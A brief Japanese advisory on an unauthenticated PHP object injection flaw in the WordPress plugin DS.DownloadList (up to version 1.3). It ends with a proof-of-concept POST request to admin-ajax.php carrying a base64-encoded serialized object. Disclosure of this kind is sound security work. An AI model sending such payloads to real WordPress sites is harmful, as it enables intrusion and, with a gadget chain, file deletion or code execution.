
DS.DownloadList <= 1.3 - 認証されていないPHPオブジェクトインジェクション
DS.DownloadList <= 1.3 - 認証不要のPHPオブジェクトインジェクション
WordPress用プラグインDS.DownloadListは、バージョン1.3を含むすべてのバージョンにおいて、信頼できない入力のデシリアライズを介したPHPオブジェクトインジェクションの脆弱性があります。これにより、認証されていない攻撃者がPHPオブジェクトを注入する可能性があります。脆弱なソフトウェアには既知のPOPチェーンは存在しません。ターゲットシステムにインストールされた追加のプラグインやテーマを介してPOPチェーンが存在する場合、攻撃者は任意のファイルを削除したり、機密データを取得したり、コードを実行したりする可能性があります。
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
action=dsdl&atts=TzoyMDoiUEhQX09iamVjdF9JbmplY3Rpb24iOjA6e30=